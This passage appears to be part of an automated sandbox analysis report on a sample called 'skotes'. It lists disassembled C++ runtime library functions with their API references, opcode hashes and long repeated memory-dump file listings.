                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2092016602-0
                                                                                                                                                                                                                                          • Opcode ID: 8f021cbe20c08123864c5956ee6a0fb4645dae5ef10170a3893b29023cd2c770
                                                                                                                                                                                                                                          • Instruction ID: 0199a65ff42df07002e5a97f486f362c997c80e691ab2d2577e6763e87df167e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f021cbe20c08123864c5956ee6a0fb4645dae5ef10170a3893b29023cd2c770
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E3183B1A006059BCF44EFA8C4919EDFBF6FF45710B14822DE516AB381CB349A41CB94
                                                                                                                                                                                                                                          Function 006ABB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
                                                                                                                                                                                                                                          • Instruction ID: e33c62303ab160b84f54c5b304842113a3dc52c00c529879a39efe8211a090de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5211D71A00219AFDF00FBA4DC819BEB7BAEF0A720F101059F501AB251DB709D419FA4
                                                                                                                                                                                                                                          Function 006B9C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006B9C9C
                                                                                                                                                                                                                                          • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 006B9CE8
                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 006B9CFE
                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 006B9D6A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2033596534-0
                                                                                                                                                                                                                                          • Opcode ID: c41509d2acce1e686654caa8606f54379636738e024aa0c7e866793e974d4f4d
                                                                                                                                                                                                                                          • Instruction ID: 2a035f7e7ef2796850bbefa67dc2459d2942dcb8486afeae3c73b1755e6a5091
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c41509d2acce1e686654caa8606f54379636738e024aa0c7e866793e974d4f4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E921B6B1905A149FCB44EF65D482DEDBBB6EF05310B21406DF201AB261DF31AD82CB65
                                                                                                                                                                                                                                          Function 006BA026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 006BA069
                                                                                                                                                                                                                                            • Part of subcall function 006BB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 006BB5AF
                                                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 006BA07F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 006BA0CB
                                                                                                                                                                                                                                            • Part of subcall function 006BAB41: List.LIBCONCRT ref: 006BAB77
                                                                                                                                                                                                                                          • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 006BA0DB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 932774601-0
                                                                                                                                                                                                                                          • Opcode ID: 14608d120ec2dd5e767a2065d38bd2d8848beba15e56b5ae6ae9db2ab8955289
                                                                                                                                                                                                                                          • Instruction ID: cd5fff8e272a6af1218e7904dd7d316692aeacf3323846af67e97e942aadca75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14608d120ec2dd5e767a2065d38bd2d8848beba15e56b5ae6ae9db2ab8955289
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B21AC72500B159FCB24EFA5C8908EBF3F6FF48700B00495EE842A7651DB70A941CBA6
                                                                                                                                                                                                                                          Function 006B4885 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B4893
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B48A5
                                                                                                                                                                                                                                            • Part of subcall function 006B5555: _InternalDeleteHelper.LIBCONCRT ref: 006B5564
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B48AF
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 006B48C8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
